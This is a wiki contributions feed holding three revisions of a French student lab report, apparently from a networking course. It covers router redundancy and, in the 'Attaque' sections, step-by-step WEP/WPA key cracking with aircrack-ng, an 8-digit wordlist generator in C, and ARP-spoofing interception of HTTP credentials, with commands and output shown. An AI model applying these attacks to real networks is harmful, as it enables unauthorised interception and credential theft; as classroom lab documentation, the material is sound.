<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tvitteco</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tvitteco"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Tvitteco"/>
		<updated>2026-05-14T05:28:20Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=54310</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=54310"/>
				<updated>2020-12-06T17:34:52Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=Partie commune=&lt;br /&gt;
&lt;br /&gt;
==Installation du 6509==&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vus hardwares.&lt;br /&gt;
&lt;br /&gt;
On a donc dû installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées-sorties.&lt;br /&gt;
&lt;br /&gt;
== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom.&lt;br /&gt;
&lt;br /&gt;
Elle consiste à se connecter au Vlan 130 afin d'avoir un accès au réseau Polytech ainsi qu'à Internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans :&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture.&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 à 11 seront distribués entre les personnes pour créer des réseaux locaux individuels.&lt;br /&gt;
&lt;br /&gt;
Les interfaces :&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
==Configuration de la redondance==&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs, on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant à l'interconnexion avec Internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
==Routeur virtuel==&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles présentent sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresse du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utilisé le HSRP de façon a ce que les communications passent en priorité sur le 6509 (si on ne fait pas cette manipulation, les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installé HSRP sur les routeurs et on a défini la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==routage VRRP==&lt;br /&gt;
&lt;br /&gt;
On utilise le protocole VRRP pour augmenter la sécurité du réseau. Ce protocole a pour but de remplacer le HSRP. Le 3560E n'étant pas compatible avec le protocole VRRP, nous avons dû le remplacer par un autre routeur :  le Catalyst 9200 24. Il faut donc transférer toute la configuration du 3560 vers le 9200. Dans un souci de fonctionnement, Mr REDON a déjà configuré le 9200 en routeur et le 3560 est utilisé en mode commutateur. Il nous reste donc à reconfigurer les vlan et les ports du 9200 pour pouvoir se passer du 3560E.&lt;br /&gt;
Une fois cela fait, on installe le protocole VRRP sur les routeurs et on configure les mêmes priorités que le protocole HSRP, puisqu'e le vrrp a pour but de le remplacer.&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec internet==&lt;br /&gt;
Nous n'avons pas eu le temps de réaliser cette partie en pratique.&lt;br /&gt;
&lt;br /&gt;
L'ISR doit permettre une redondance au niveau du fournisseur d'accès internet. Dans le cas ou renater ne serais plus capable d'assurer un accès à Internet, la connexion doit passer par l'ISR qui est relier à internet via un autre fournisseur d'accès.&lt;br /&gt;
&lt;br /&gt;
Il faut donc configurer l'isr avec le protocole VRRP en lui donnant une priorité faible (par exemple 80). De cette façon, il se placera en troisième position derrière le 6509 et le 9200. Ensuite, il faut configurer le protocole SLA sur le 6509 et le 9200 pour que ces routeurs vérifient que la connexion à Internet est fonctionnel. Dans le cas ou la connections ne serais pas fonctionnel, leurs priorités VRRP devrai baisser en dessus de la priorité de l'ISR de façon a ce que tout le flux de données passe par l'ISR. Une fois la connections rétablie entre les routeurs principaux et renater, ils reprennent leurs priorités de base et l'ISR se place en routeur de secours.&lt;br /&gt;
&lt;br /&gt;
=Installation des VM=&lt;br /&gt;
&lt;br /&gt;
Les VM sont installées sur le serveur capBreton. Elles sont reliées aux deux routeurs du réseau via un routeur virtuel. Elles sont présentes sur le Vlan 2 et elles possèdent toutes des adresses IP routable, ce qui permet, a n'importe quel appareil connecté à Internet, de se connecter en ssh à ces derniers.&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
On utilise airmon pour configurer la clef wifi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le réseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Ensuite, on liste tous les paquets qui passent avec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel où se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on décode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
On effectue la même procédure que pour la clef wep. Pour le décodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va génerer tous les mots de passes possibles qui sont sous la forme de 8 chiffres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Si besoin, pour accélérer le traitement, on peut partager la charge de travail sur plusieurs pc. Pour ce faire, on utilise la commande split pour séparer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transférer les fichiers, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mots de passe présents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste à se faire passer pour le routeur et ainsi modifier les données qui transitent&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier spécifique et il ne peut pas être modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour récupérer l'adresse ip du routeur et on envoie des réponses arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'adresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponses arp et va changer ca table d'adressage en considérant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requêtes à ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non sécurisé, on peut visualiser l'ensemble des communications entre l'ordinateur attaqué et les sites http comme les mots de passe&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données pas chifrement==&lt;br /&gt;
&lt;br /&gt;
Pour crypter les données d'une clef USB, on a besoin de deux packages : lvm2 et cryptsetup.&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, on supprime les différentes partissions de la clef USB via la commande :&lt;br /&gt;
fdisk [emplacement de la clef usb]&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande cryptsetup:&lt;br /&gt;
cryptsetup -y -v luks [emplacement de la clef usb]&lt;br /&gt;
&lt;br /&gt;
Puis en renseigne le mot de passe a utiliser.&lt;br /&gt;
Désormais, pour utiliser la clef USB, il faudra entrer le mot de passe définie.&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53970</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53970"/>
				<updated>2020-11-20T11:38:36Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Partie commune */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=Partie commune=&lt;br /&gt;
&lt;br /&gt;
==Installation du 6509==&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
==Configuration de la redondance==&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Routeur virtuel==&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==routage VRRP==&lt;br /&gt;
&lt;br /&gt;
on utilise le protocol VRRP pour augmenter la sécurité du réseau. Ce protocol a pour but de remplacer le HSRP. Le 3560E n'etant pas compaible avec le protocol VRRP, nous avons dus utiliser le remplacer par un autre routeur:le Catalyst 9200 24. Il faut donc transferet toute la configuration du 3560 vers le 9200. Dans un soucis de fonctionement, Mr REDON a déja configurer le 9200 en routeur et le 3560 est utiliser en mode comutateur. Il ne nous reste donc a reconfigurer les vlan et les ports du 9200 pour pouvoir ce passer du 3560E.&lt;br /&gt;
Une fois cela fait, on installe le protocol VRRP sur les routeurs et on configure les memes prioritées que le protocol HSRP, puisqu'e le vrrp a pour but de le remplacer.&lt;br /&gt;
&lt;br /&gt;
==Interconnexion avec internet==&lt;br /&gt;
Nous n'avons pas eu le tmeps de realiser cette partie en pratique.&lt;br /&gt;
&lt;br /&gt;
L'ISR doit permetre une redondance au niveau du fournusseur d'acces internet. Dans le cas ou renatere ne serais plus capable d'assurer un acces a internet, la connexion doit passer par l'isr qui eset relier a internet via un autre fournisseur d'acces.&lt;br /&gt;
Il faut donc configurer l'isr avec le protocol VRRP en lui donnant une priorité faible (par exemple 80). De cette facon, il se placera en troisieme position deriere le 6509 et le 9200. Ensuite, il faut configuerer le protocol SLA sur le 6509 et le 9200 pour que ces routeurs verifient que la connexion a in ternet est fonctionnel. Dans le cas ou la connextion ne serais pas fonctionnnel, leurs prorité VRRP devrai baisser en desous de la priorité de l'ISR de facon a ce que tout le flux de données passe par l'ISR. Une foie la connextion retabie entre les routeurs principaux et renater, ils reprennent leurs prioritées de base et l'ISR se place en routeur de secour.&lt;br /&gt;
&lt;br /&gt;
=Installation des VM=&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53965</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53965"/>
				<updated>2020-11-20T11:13:33Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
pastabox.site[http://193.48.57.169]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=Partie commune=&lt;br /&gt;
&lt;br /&gt;
==Installation du 6509==&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
== configuration 3560E ==&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
==Configuration de la redondance==&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Routeur virtuel==&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
=Installation des VM=&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
